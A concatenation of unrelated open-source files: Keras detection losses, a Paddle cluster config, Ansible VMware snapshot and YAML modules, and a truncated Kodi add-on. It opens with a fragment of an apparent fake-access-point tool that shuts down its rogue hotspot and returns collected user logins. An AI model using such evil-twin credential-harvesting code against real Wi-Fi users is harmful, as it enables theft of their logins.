def stop(self):
print("[*] FAKE_AP RECEIVED STOP SIGNAL")
if self.isRunning:
try:
self.dhcp.stop()
self.dns_server.stop()
self.web_process.terminate()
except:
pass
execute('iptables -P FORWARD DROP')
if self.wlan:
execute('iptables -D OUTPUT --out-interface ' + self.wlan + ' -j ACCEPT')
execute('iptables -D INPUT --in-interface ' + self.wlan + ' -j ACCEPT')
execute('iptables --table nat --delete-chain')
execute('iptables --table nat -F')
execute('iptables --table nat -X')
execute('sysctl -w net.ipv4.ip_forward=0')
execute('killall hostapd') # Consider using its PID instead.
execute('ifconfig ' + self.wlan + ' down')
self.isRunning = False
@staticmethod
def get_values_login():
'''
Returns the collected user login information.
'''
try:
get_values = json.dumps(open('/tmp/login.json', 'r').read())
return get_values
except IOError:
return json.dumps([{}])
@staticmethod
def get_values_connect():
'''
Returns the collected device information.
'''
try:
get_values = json.dumps(open('/tmp/connect.json', 'r').read())
return get_values
except IOError:
return json.dumps([{}])
| apache-2.0 |
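The login/connect logs in the file above are assembled by stripping `[` and `]` from a string and re-wrapping it, then `json.dump`-ing that string, which stores a JSON-encoded string rather than a real JSON array. A sketch of an alternative that keeps a genuine list on disk — not the tool's actual code; `append_record` and the temporary path are hypothetical:

```python
import json
import os
import tempfile

def append_record(path, record):
    """Append a dict to a JSON array stored on disk, creating the file if needed."""
    try:
        with open(path) as fh:
            records = json.load(fh)
    except (OSError, ValueError):
        # Missing or unparsable file: start a fresh list
        records = []
    records.append(record)
    with open(path, 'w') as fh:
        json.dump(records, fh, ensure_ascii=False)
    return records

# Example usage with a temporary file standing in for /tmp/login.json
path = os.path.join(tempfile.mkdtemp(), 'login.json')
append_record(path, {'id': 'alice', 'ip_addr': '192.168.103.2'})
records = append_record(path, {'id': 'bob', 'ip_addr': '192.168.103.3'})
```

Because the file always holds valid JSON, consumers can load it directly instead of unwrapping a double-encoded string.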
yhalk/vw_challenge_ECR | src/jetson/keras_frcnn/losses.py | 6 | 2089 | from keras import backend as K
from keras.objectives import categorical_crossentropy
if K.image_dim_ordering() == 'tf':
import tensorflow as tf
lambda_rpn_regr = 1.0
lambda_rpn_class = 1.0
lambda_cls_regr = 1.0
lambda_cls_class = 1.0
epsilon = 1e-4
def rpn_loss_regr(num_anchors):
def rpn_loss_regr_fixed_num(y_true, y_pred):
if K.image_dim_ordering() == 'th':
x = y_true[:, 4 * num_anchors:, :, :] - y_pred
x_abs = K.abs(x)
x_bool = K.less_equal(x_abs, 1.0)
return lambda_rpn_regr * K.sum(
y_true[:, :4 * num_anchors, :, :] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(epsilon + y_true[:, :4 * num_anchors, :, :])
else:
x = y_true[:, :, :, 4 * num_anchors:] - y_pred
x_abs = K.abs(x)
x_bool = K.cast(K.less_equal(x_abs, 1.0), tf.float32)
return lambda_rpn_regr * K.sum(
y_true[:, :, :, :4 * num_anchors] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(epsilon + y_true[:, :, :, :4 * num_anchors])
return rpn_loss_regr_fixed_num
def rpn_loss_cls(num_anchors):
def rpn_loss_cls_fixed_num(y_true, y_pred):
if K.image_dim_ordering() == 'tf':
return lambda_rpn_class * K.sum(y_true[:, :, :, :num_anchors] * K.binary_crossentropy(y_pred[:, :, :, :], y_true[:, :, :, num_anchors:])) / K.sum(epsilon + y_true[:, :, :, :num_anchors])
else:
return lambda_rpn_class * K.sum(y_true[:, :num_anchors, :, :] * K.binary_crossentropy(y_pred[:, :, :, :], y_true[:, num_anchors:, :, :])) / K.sum(epsilon + y_true[:, :num_anchors, :, :])
return rpn_loss_cls_fixed_num
def class_loss_regr(num_classes):
def class_loss_regr_fixed_num(y_true, y_pred):
x = y_true[:, :, 4*num_classes:] - y_pred
x_abs = K.abs(x)
x_bool = K.cast(K.less_equal(x_abs, 1.0), 'float32')
return lambda_cls_regr * K.sum(y_true[:, :, :4*num_classes] * (x_bool * (0.5 * x * x) + (1 - x_bool) * (x_abs - 0.5))) / K.sum(epsilon + y_true[:, :, :4*num_classes])
return class_loss_regr_fixed_num
def class_loss_cls(y_true, y_pred):
return lambda_cls_class * K.mean(categorical_crossentropy(y_true[0, :, :], y_pred[0, :, :]))
| apache-2.0 |
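The regression losses above implement the smooth L1 (Huber-style) penalty used for box regression: quadratic for |x| <= 1, linear beyond, so large errors are not squared. A minimal scalar sketch of that piecewise function in plain Python, independent of the Keras backend:

```python
def smooth_l1(x):
    # Piecewise: 0.5*x^2 when |x| <= 1, |x| - 0.5 otherwise
    ax = abs(x)
    return 0.5 * x * x if ax <= 1.0 else ax - 0.5

# A few sample residuals
losses = [smooth_l1(v) for v in (0.5, -0.5, 2.0, -3.0)]
```

The two branches meet at |x| = 1 with the same value (0.5) and slope, which is what makes the loss smooth.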
comeonfox/Paddle | paddle/scripts/cluster_train/conf.py | 1 | 1120 | # Copyright (c) 2016 Baidu, Inc. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
HOSTS = [
"root@192.168.100.17",
"root@192.168.100.18",
]
'''
workspace configuration
'''
#root dir for workspace, can be set as any director with real user account
ROOT_DIR = "/home/paddle"
'''
network configuration
'''
#pserver nics
PADDLE_NIC = "eth0"
#pserver port
PADDLE_PORT = 7164
#pserver ports num
PADDLE_PORTS_NUM = 2
#pserver sparse ports num
PADDLE_PORTS_NUM_FOR_SPARSE = 2
#environments setting for all processes in cluster job
LD_LIBRARY_PATH="/usr/local/cuda/lib64:/usr/lib64"
| apache-2.0 |
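A hypothetical sketch of how a launcher might expand the port settings above into concrete dense and sparse pserver port lists — the variable names mirror this config file, but the expansion logic is an assumption, not Paddle's actual launcher:

```python
# Values copied from the config above
PADDLE_PORT = 7164
PADDLE_PORTS_NUM = 2
PADDLE_PORTS_NUM_FOR_SPARSE = 2

# Dense ports occupy the first block, sparse ports follow immediately after
dense_ports = list(range(PADDLE_PORT, PADDLE_PORT + PADDLE_PORTS_NUM))
sparse_ports = list(range(PADDLE_PORT + PADDLE_PORTS_NUM,
                          PADDLE_PORT + PADDLE_PORTS_NUM + PADDLE_PORTS_NUM_FOR_SPARSE))
```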
t794104/ansible | lib/ansible/modules/cloud/vmware/vmware_guest_snapshot.py | 13 | 17807 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# This module is also sponsored by E.T.A.I. (www.etai.fr)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_guest_snapshot
short_description: Manages virtual machines snapshots in vCenter
description:
- This module can be used to create, delete and update snapshot(s) of the given virtual machine.
- All parameters and VMware object names are case sensitive.
version_added: 2.3
author:
- Loic Blot (@nerzhul) <loic.blot@unix-experience.fr>
notes:
- Tested on vSphere 5.5, 6.0 and 6.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
state:
description:
- Manage snapshot(s) attached to a specific virtual machine.
- If set to C(present) and snapshot absent, then will create a new snapshot with the given name.
- If set to C(present) and snapshot present, then no changes are made.
- If set to C(absent) and snapshot present, then snapshot with the given name is removed.
- If set to C(absent) and snapshot absent, then no changes are made.
- If set to C(revert) and snapshot present, then virtual machine state is reverted to the given snapshot.
- If set to C(revert) and snapshot absent, then no changes are made.
- If set to C(remove_all) and snapshot(s) present, then all snapshot(s) will be removed.
- If set to C(remove_all) and snapshot(s) absent, then no changes are made.
required: True
choices: ['present', 'absent', 'revert', 'remove_all']
default: 'present'
name:
description:
- Name of the virtual machine to work with.
- This is required parameter, if C(uuid) is not supplied.
name_match:
description:
- If multiple VMs matching the name, use the first or last found.
default: 'first'
choices: ['first', 'last']
uuid:
description:
- UUID of the instance to manage if known, this is VMware's BIOS UUID by default.
- This is required if C(name) parameter is not supplied.
use_instance_uuid:
description:
- Whether to use the VMWare instance UUID rather than the BIOS UUID.
default: no
type: bool
version_added: '2.8'
folder:
description:
- Destination folder, absolute or relative path to find an existing guest.
- This is required parameter, if C(name) is supplied.
- The folder should include the datacenter. ESX's datacenter is ha-datacenter.
- 'Examples:'
- ' folder: /ha-datacenter/vm'
- ' folder: ha-datacenter/vm'
- ' folder: /datacenter1/vm'
- ' folder: datacenter1/vm'
- ' folder: /datacenter1/vm/folder1'
- ' folder: datacenter1/vm/folder1'
- ' folder: /folder1/datacenter1/vm'
- ' folder: folder1/datacenter1/vm'
- ' folder: /folder1/datacenter1/vm/folder2'
- ' folder: vm/folder2'
- ' folder: folder2'
datacenter:
description:
- Destination datacenter for the deploy operation.
required: True
snapshot_name:
description:
- Sets the snapshot name to manage.
- This param is required only if state is not C(remove_all)
description:
description:
- Define an arbitrary description to attach to snapshot.
default: ''
quiesce:
description:
- If set to C(true) and virtual machine is powered on, it will quiesce the file system in virtual machine.
- Note that VMWare Tools are required for this flag.
- If virtual machine is powered off or VMware Tools are not available, then this flag is set to C(false).
- If virtual machine does not provide capability to take quiesce snapshot, then this flag is set to C(false).
required: False
version_added: "2.4"
type: bool
default: False
memory_dump:
description:
- If set to C(true), memory dump of virtual machine is also included in snapshot.
- Note that memory snapshots take time and resources, this will take longer time to create.
- If virtual machine does not provide capability to take memory snapshot, then this flag is set to C(false).
required: False
version_added: "2.4"
type: bool
default: False
remove_children:
description:
- If set to C(true) and state is set to C(absent), then entire snapshot subtree is set for removal.
required: False
version_added: "2.4"
type: bool
default: False
new_snapshot_name:
description:
- Value to rename the existing snapshot to.
version_added: "2.5"
new_description:
description:
- Value to change the description of an existing snapshot to.
version_added: "2.5"
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
- name: Create a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: present
snapshot_name: snap1
description: snap1_description
delegate_to: localhost
- name: Remove a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: absent
snapshot_name: snap1
delegate_to: localhost
- name: Revert to a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: revert
snapshot_name: snap1
delegate_to: localhost
- name: Remove all snapshots of a VM
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: remove_all
delegate_to: localhost
- name: Take snapshot of a VM using quiesce and memory flag on
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: present
snapshot_name: dummy_vm_snap_0001
quiesce: yes
memory_dump: yes
delegate_to: localhost
- name: Remove a snapshot and snapshot subtree
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: absent
remove_children: yes
snapshot_name: snap1
delegate_to: localhost
- name: Rename a snapshot
vmware_guest_snapshot:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter: "{{ datacenter_name }}"
folder: "/{{ datacenter_name }}/vm/"
name: "{{ guest_name }}"
state: present
snapshot_name: current_snap_name
new_snapshot_name: im_renamed
new_description: "{{ new_snapshot_description }}"
delegate_to: localhost
'''
RETURN = """
snapshot_results:
description: metadata about the virtual machine snapshots
returned: always
type: dict
sample: {
"current_snapshot": {
"creation_time": "2019-04-09T14:40:26.617427+00:00",
"description": "Snapshot 4 example",
"id": 4,
"name": "snapshot4",
"state": "poweredOff"
},
"snapshots": [
{
"creation_time": "2019-04-09T14:38:24.667543+00:00",
"description": "Snapshot 3 example",
"id": 3,
"name": "snapshot3",
"state": "poweredOff"
},
{
"creation_time": "2019-04-09T14:40:26.617427+00:00",
"description": "Snapshot 4 example",
"id": 4,
"name": "snapshot4",
"state": "poweredOff"
}
]
}
"""
import time
try:
from pyVmomi import vim
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
from ansible.module_utils.vmware import PyVmomi, list_snapshots, vmware_argument_spec
class PyVmomiHelper(PyVmomi):
def __init__(self, module):
super(PyVmomiHelper, self).__init__(module)
@staticmethod
def wait_for_task(task):
# https://www.vmware.com/support/developer/vc-sdk/visdk25pubs/ReferenceGuide/vim.Task.html
# https://www.vmware.com/support/developer/vc-sdk/visdk25pubs/ReferenceGuide/vim.TaskInfo.html
# https://github.com/virtdevninja/pyvmomi-community-samples/blob/master/samples/tools/tasks.py
while task.info.state not in ['success', 'error']:
time.sleep(1)
def get_snapshots_by_name_recursively(self, snapshots, snapname):
snap_obj = []
for snapshot in snapshots:
if snapshot.name == snapname:
snap_obj.append(snapshot)
else:
snap_obj = snap_obj + self.get_snapshots_by_name_recursively(snapshot.childSnapshotList, snapname)
return snap_obj
def snapshot_vm(self, vm):
memory_dump = False
quiesce = False
# Check whether a snapshot with the user-specified name already exists
if vm.snapshot is not None:
snap_obj = self.get_snapshots_by_name_recursively(vm.snapshot.rootSnapshotList,
self.module.params["snapshot_name"])
if snap_obj:
# Snapshot already exists; do nothing.
self.module.exit_json(changed=False,
msg="Snapshot named [%(snapshot_name)s] already exists and is current." % self.module.params)
# Check if Virtual Machine provides capabilities for Quiesce and Memory Snapshots
if vm.capability.quiescedSnapshotsSupported:
quiesce = self.module.params['quiesce']
if vm.capability.memorySnapshotsSupported:
memory_dump = self.module.params['memory_dump']
task = None
try:
task = vm.CreateSnapshot(self.module.params["snapshot_name"],
self.module.params["description"],
memory_dump,
quiesce)
except vim.fault.RestrictedVersion as exc:
self.module.fail_json(msg="Failed to take snapshot due to VMware Licence"
" restriction : %s" % to_native(exc.msg))
except Exception as exc:
self.module.fail_json(msg="Failed to create snapshot of virtual machine"
" %s due to %s" % (self.module.params['name'], to_native(exc)))
return task
def rename_snapshot(self, vm):
if vm.snapshot is None:
self.module.fail_json(msg="virtual machine - %s doesn't have any"
" snapshots" % (self.module.params.get('uuid') or self.module.params.get('name')))
snap_obj = self.get_snapshots_by_name_recursively(vm.snapshot.rootSnapshotList,
self.module.params["snapshot_name"])
task = None
if len(snap_obj) == 1:
snap_obj = snap_obj[0].snapshot
if self.module.params["new_snapshot_name"] and self.module.params["new_description"]:
task = snap_obj.RenameSnapshot(name=self.module.params["new_snapshot_name"],
description=self.module.params["new_description"])
elif self.module.params["new_snapshot_name"]:
task = snap_obj.RenameSnapshot(name=self.module.params["new_snapshot_name"])
else:
task = snap_obj.RenameSnapshot(description=self.module.params["new_description"])
else:
self.module.exit_json(
msg="Couldn't find any snapshots with specified name: %s on VM: %s" %
(self.module.params["snapshot_name"],
self.module.params.get('uuid') or self.module.params.get('name')))
return task
def remove_or_revert_snapshot(self, vm):
if vm.snapshot is None:
vm_name = (self.module.params.get('uuid') or self.module.params.get('name'))
if self.module.params.get('state') == 'revert':
self.module.fail_json(msg="virtual machine - %s does not"
" have any snapshots to revert to." % vm_name)
self.module.exit_json(msg="virtual machine - %s doesn't have any"
" snapshots to remove." % vm_name)
snap_obj = self.get_snapshots_by_name_recursively(vm.snapshot.rootSnapshotList,
self.module.params["snapshot_name"])
task = None
if len(snap_obj) == 1:
snap_obj = snap_obj[0].snapshot
if self.module.params["state"] == "absent":
# Remove subtree depending upon the user input
remove_children = self.module.params.get('remove_children', False)
task = snap_obj.RemoveSnapshot_Task(remove_children)
elif self.module.params["state"] == "revert":
task = snap_obj.RevertToSnapshot_Task()
else:
self.module.exit_json(msg="Couldn't find any snapshots with"
" specified name: %s on VM: %s" % (self.module.params["snapshot_name"],
self.module.params.get('uuid') or self.module.params.get('name')))
return task
def apply_snapshot_op(self, vm):
result = {}
if self.module.params["state"] == "present":
if self.module.params["new_snapshot_name"] or self.module.params["new_description"]:
self.rename_snapshot(vm)
result = {'changed': True, 'failed': False, 'renamed': True}
task = None
else:
task = self.snapshot_vm(vm)
elif self.module.params["state"] in ["absent", "revert"]:
task = self.remove_or_revert_snapshot(vm)
elif self.module.params["state"] == "remove_all":
task = vm.RemoveAllSnapshots()
else:
# This should not happen
raise AssertionError()
if task:
self.wait_for_task(task)
if task.info.state == 'error':
result = {'changed': False, 'failed': True, 'msg': task.info.error.msg}
else:
result = {'changed': True, 'failed': False, 'snapshot_results': list_snapshots(vm)}
return result
def main():
argument_spec = vmware_argument_spec()
argument_spec.update(
state=dict(default='present', choices=['present', 'absent', 'revert', 'remove_all']),
name=dict(type='str'),
name_match=dict(type='str', choices=['first', 'last'], default='first'),
uuid=dict(type='str'),
use_instance_uuid=dict(type='bool', default=False),
folder=dict(type='str'),
datacenter=dict(required=True, type='str'),
snapshot_name=dict(type='str'),
description=dict(type='str', default=''),
quiesce=dict(type='bool', default=False),
memory_dump=dict(type='bool', default=False),
remove_children=dict(type='bool', default=False),
new_snapshot_name=dict(type='str'),
new_description=dict(type='str'),
)
module = AnsibleModule(argument_spec=argument_spec,
required_together=[['name', 'folder']],
required_one_of=[['name', 'uuid']],
)
if module.params['folder']:
# FindByInventoryPath() does not require an absolute path
# so we should leave the input folder path unmodified
module.params['folder'] = module.params['folder'].rstrip('/')
pyv = PyVmomiHelper(module)
# Check if the VM exists before continuing
vm = pyv.get_vm()
if not vm:
# If UUID is set, get_vm selects by UUID; report whichever identifier was used.
module.fail_json(msg="Unable to manage snapshots for non-existing VM %s" % (module.params.get('uuid') or
module.params.get('name')))
if not module.params['snapshot_name'] and module.params['state'] != 'remove_all':
module.fail_json(msg="snapshot_name param is required when state is '%(state)s'" % module.params)
result = pyv.apply_snapshot_op(vm)
if 'failed' not in result:
result['failed'] = False
if result['failed']:
module.fail_json(**result)
else:
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
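`get_snapshots_by_name_recursively()` above walks the snapshot tree and, notably, does not descend below a matching node (the recursion sits in the `else` branch). A self-contained sketch of the same traversal over a stand-in tree — the `Snap` class is a hypothetical substitute for pyVmomi's snapshot objects:

```python
class Snap(object):
    # Minimal stand-in for a pyVmomi snapshot tree node
    def __init__(self, name, children=None):
        self.name = name
        self.childSnapshotList = children or []

def find_snapshots(snapshots, snapname):
    # Mirrors the module's logic: children of a match are NOT searched
    found = []
    for snap in snapshots:
        if snap.name == snapname:
            found.append(snap)
        else:
            found += find_snapshots(snap.childSnapshotList, snapname)
    return found

tree = [Snap('other', [Snap('snap1')]),
        Snap('snap1', [Snap('snap1')])]
matches = find_snapshots(tree, 'snap1')
```

With this tree, the `snap1` nested under the top-level `snap1` is skipped, while the one under `other` is found — two matches in total.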
stevekuznetsov/ansible | lib/ansible/parsing/yaml/constructor.py | 10 | 5927 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from yaml.constructor import SafeConstructor, ConstructorError
from yaml.nodes import MappingNode
from ansible.module_utils._text import to_bytes
from ansible.parsing.vault import VaultLib
from ansible.parsing.yaml.objects import AnsibleMapping, AnsibleSequence, AnsibleUnicode
from ansible.parsing.yaml.objects import AnsibleVaultEncryptedUnicode
from ansible.vars.unsafe_proxy import wrap_var
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class AnsibleConstructor(SafeConstructor):
def __init__(self, file_name=None, vault_password=None):
self._vault_password = vault_password
self._ansible_file_name = file_name
super(AnsibleConstructor, self).__init__()
self._vaults = {}
self._vaults['default'] = VaultLib(password=self._vault_password)
def construct_yaml_map(self, node):
data = AnsibleMapping()
yield data
value = self.construct_mapping(node)
data.update(value)
data.ansible_pos = self._node_position_info(node)
def construct_mapping(self, node, deep=False):
# Most of this is from yaml.constructor.SafeConstructor. We replicate
# it here so that we can warn users when they have duplicate dict keys
# (pyyaml silently allows overwriting keys)
if not isinstance(node, MappingNode):
raise ConstructorError(None, None,
"expected a mapping node, but found %s" % node.id,
node.start_mark)
self.flatten_mapping(node)
mapping = AnsibleMapping()
# Add our extra information to the returned value
mapping.ansible_pos = self._node_position_info(node)
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
try:
hash(key)
except TypeError as exc:
raise ConstructorError("while constructing a mapping", node.start_mark,
"found unacceptable key (%s)" % exc, key_node.start_mark)
if key in mapping:
display.warning(u'While constructing a mapping from {1}, line {2}, column {3}, found a duplicate dict key ({0}).'
u' Using last defined value only.'.format(key, *mapping.ansible_pos))
value = self.construct_object(value_node, deep=deep)
mapping[key] = value
return mapping
def construct_yaml_str(self, node, unsafe=False):
# Override the default string handling function
# to always return unicode objects
value = self.construct_scalar(node)
ret = AnsibleUnicode(value)
ret.ansible_pos = self._node_position_info(node)
if unsafe:
ret = wrap_var(ret)
return ret
def construct_vault_encrypted_unicode(self, node):
value = self.construct_scalar(node)
ciphertext_data = to_bytes(value)
if self._vault_password is None:
raise ConstructorError(None, None,
"found vault but no vault password provided", node.start_mark)
# could pass in a key id here to choose the vault to associate with
vault = self._vaults['default']
ret = AnsibleVaultEncryptedUnicode(ciphertext_data)
ret.vault = vault
return ret
def construct_yaml_seq(self, node):
data = AnsibleSequence()
yield data
data.extend(self.construct_sequence(node))
data.ansible_pos = self._node_position_info(node)
def construct_yaml_unsafe(self, node):
return self.construct_yaml_str(node, unsafe=True)
def _node_position_info(self, node):
# the line number where the previous token has ended (plus empty lines)
# Add one so that the first line is line 1 rather than line 0
column = node.start_mark.column + 1
line = node.start_mark.line + 1
# in some cases, we may have pre-read the data and then
# passed it to the load() call for YAML, in which case we
# want to override the default datasource (which would be
# '<string>') to the actual filename we read in
datasource = self._ansible_file_name or node.start_mark.name
return (datasource, line, column)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:map',
AnsibleConstructor.construct_yaml_map)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:python/dict',
AnsibleConstructor.construct_yaml_map)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:str',
AnsibleConstructor.construct_yaml_str)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:python/unicode',
AnsibleConstructor.construct_yaml_str)
AnsibleConstructor.add_constructor(
u'tag:yaml.org,2002:seq',
AnsibleConstructor.construct_yaml_seq)
AnsibleConstructor.add_constructor(
u'!unsafe',
AnsibleConstructor.construct_yaml_unsafe)
AnsibleConstructor.add_constructor(u'!vault', AnsibleConstructor.construct_vault_encrypted_unicode)
| gpl-3.0 |
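`construct_mapping()` above replicates PyYAML's SafeConstructor so it can warn when a dict key is defined twice, with the last value silently winning otherwise. The core of that duplicate-key check, sketched over plain (key, value) pairs rather than YAML nodes:

```python
def build_mapping(pairs, warn):
    # Last value wins, mirroring PyYAML's behaviour; warn on each duplicate key
    mapping = {}
    for key, value in pairs:
        if key in mapping:
            warn('found a duplicate dict key (%s); using last defined value only' % key)
        mapping[key] = value
    return mapping

warnings = []
result = build_mapping([('a', 1), ('b', 2), ('a', 3)], warnings.append)
```

Passing the warning sink as a callable (here `warnings.append`) keeps the sketch testable; the Ansible code routes the same message through `display.warning()` with position info attached.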
the-black-eagle/script.radio.streaming.helper | resources/lib/utils.py | 1 | 50411 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
# (C) Black_eagle 2016 - 2019
#
import xbmc, xbmcvfs, xbmcaddon
import xbmcgui
import urllib, urllib2, re
import uuid
import sys, traceback
from resources.lib.audiodb import audiodbinfo as settings
from resources.lib.audiodb import lastfminfo as lfmsettings
import pickle
import datetime
if sys.version_info >= (2, 7):
import json as _json
else:
import simplejson as _json
from threading import Timer
rusty_gate = settings.rusty_gate
happy_hippo = lfmsettings.happy_hippo
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
addonversion = addon.getAddonInfo('version')
addonpath = addon.getAddonInfo('path').decode('utf-8')
addonid = addon.getAddonInfo('id').decode('utf-8')
language = addon.getLocalizedString
# Global variables
BaseString = addon.getSetting('musicdirectory') # Base directory for Music albums
logostring = xbmc.translatePath('special://profile/addon_data/' + addonid + '/').decode('utf-8') # Base directory to store downloaded logos
logfile = xbmc.translatePath('special://temp/srh.log').decode('utf-8')
pathToAlbumCover = None
albumtitle = ""
keydata = None
tadb_albumid = None
RealAlbumThumb = None
RealCDArt = None
AlbumDescription = None
AlbumReview = None
was_playing = ""
local_logo = False
got_info = 0
lastfm_first_time = 0
lastfm_delay = 5
use_lastfm = False
lastfm_username = ''
albumtitle = None
counts = {}
if addon.getSetting('centralcache') == 'true':
logostring = addon.getSetting('cachepath')
dict1 = {} # Key = artistname+trackname, value = Album name
dict2 = {} # Key = artistname+trackname, value = Album year
dict3 = {} # Key = artistname+trackname, value = date last looked up
dict4 = {} # Key = Artist Name, Value = URL to artist thumb
dict5 = {} # Key = Artist Name, Value = URL to artist banner
dict6 = {} # Key = artist Name, value = MBID
dict7 = {} # Key = Artistname+trackname, value = Track details
dict8 = {} # Key = Albumname, value = recordlabel
dict9 = {} # Key = Albumname, value = album thumb
dict10 = {} # Key = Albumname, value = CD thumb
dict11 = {} # Key = Albumname, value = Album description
dict12 = {} # Key = Albumname, value = Album review
time_diff = datetime.timedelta(days=7) # date to next check
todays_date = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time())
BaseString = xbmc.validatePath(BaseString)
featured_artist_match = ['ft.','Ft.','Feat.','feat.',' / ','vs.','Vs.','ft','Ft','Feat','feat']
onlinelookup = addon.getSetting('onlinelookup')
fanart = addon.getSetting('usefanarttv')
tadb = addon.getSetting('usetadb')
replacelist={addon.getSetting('st1find').strip(): addon.getSetting('st1rep').strip(), \
addon.getSetting('st2find').strip(): addon.getSetting('st2rep').strip(), \
addon.getSetting('st3find').strip(): addon.getSetting('st3rep').strip(), \
addon.getSetting('st4find').strip(): addon.getSetting('st4rep').strip(), \
addon.getSetting('st5find').strip(): addon.getSetting('st5rep').strip(), \
addon.getSetting('st6find').strip(): addon.getSetting('st6rep').strip(), \
addon.getSetting('st7find').strip(): addon.getSetting('st7rep').strip(), \
addon.getSetting('st8find').strip(): addon.getSetting('st8rep').strip(), \
addon.getSetting('st9find').strip(): addon.getSetting('st9rep').strip(), \
addon.getSetting('st10find').strip(): addon.getSetting('st10rep').strip()}
# st1rep = station name (as replaced)
swaplist = {addon.getSetting('st1rep').strip(): addon.getSetting('rev1'), \
addon.getSetting('st2rep').strip(): addon.getSetting('rev2'), \
addon.getSetting('st3rep').strip(): addon.getSetting('rev3'), \
addon.getSetting('st4rep').strip(): addon.getSetting('rev4'), \
addon.getSetting('st5rep').strip(): addon.getSetting('rev5'), \
addon.getSetting('st6rep').strip(): addon.getSetting('rev6'), \
addon.getSetting('st7rep').strip(): addon.getSetting('rev7'), \
addon.getSetting('st8rep').strip(): addon.getSetting('rev8'), \
addon.getSetting('st9rep').strip(): addon.getSetting('rev9'), \
addon.getSetting('st10rep').strip(): addon.getSetting('rev10')}
use_lastfm_setting = {addon.getSetting('st1rep').strip(): addon.getSetting('scrobble1'), \
addon.getSetting('st2rep').strip(): addon.getSetting('scrobble2'), \
addon.getSetting('st3rep').strip(): addon.getSetting('scrobble3'), \
addon.getSetting('st4rep').strip(): addon.getSetting('scrobble4'), \
addon.getSetting('st5rep').strip(): addon.getSetting('scrobble5'), \
addon.getSetting('st6rep').strip(): addon.getSetting('scrobble6'), \
addon.getSetting('st7rep').strip(): addon.getSetting('scrobble7'), \
addon.getSetting('st8rep').strip(): addon.getSetting('scrobble8'), \
addon.getSetting('st9rep').strip(): addon.getSetting('scrobble9'), \
addon.getSetting('st10rep').strip(): addon.getSetting('scrobble10')}
lastfm_usernames = {addon.getSetting('st1rep').strip(): addon.getSetting('url1'), \
